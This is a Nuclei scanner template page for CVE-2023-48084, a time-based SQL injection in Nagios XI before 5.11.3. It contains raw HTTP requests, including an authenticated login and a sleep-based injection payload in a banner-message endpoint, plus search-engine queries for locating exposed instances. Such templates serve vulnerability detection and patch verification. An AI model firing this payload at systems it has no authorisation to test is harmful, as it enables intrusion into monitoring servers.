Skip to content
Nuclei Templates

Nagios XI < 5.11.3 - SQL Injection

ID: CVE-2023-48084

Severity: critical

Author: ritikchaddha

Tags: time-based-sqli,cve,cve2023,nagiosxi,sqli,authenticated,nagios

Description

Section titled “Description”

SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.

YAML Source

Section titled “YAML Source”
id: CVE-2023-48084


info:
  name: Nagios XI < 5.11.3 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive information.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
  reference:
    - https://github.com/bucketcat/CVE-2023-48084
    - https://github.com/Hamibubu/CVE-2023-48084
    - https://nvd.nist.gov/vuln/detail/CVE-2023-48084
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-48084
    cwe-id: CWE-89
    epss-score: 0.00114
    epss-percentile: 0.44856
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query:
      - title="Nagios XI"
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: time-based-sqli,cve,cve2023,nagiosxi,sqli,authenticated,nagios


http:
  - raw:
      - |
        GET /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}


      - |
        POST /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        nsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=


      - |
        @timeout: 15s
        GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1
        Host: {{Hostname}}


    host-redirects: true
    max-redirects: 2


    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration_3>=5'
          - 'contains(body_3, "Home Dashboard</a>")'
        condition: and


    extractors:
      - type: regex
        name: nsp
        part: body
        group: 1
        regex:
          - 'name="nsp" value="(.*)">'
        internal: true
# digest: 490a00463044022028556d1d6af23a2d2f30e9aeebb5a81e0a8fc39cc773fa448dc6da40420f040d022006e4aaecc374134621742d048d2092a0c3aca6380f470bb4a3d8fc8beb69eb56:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-48084.yaml"

View on Github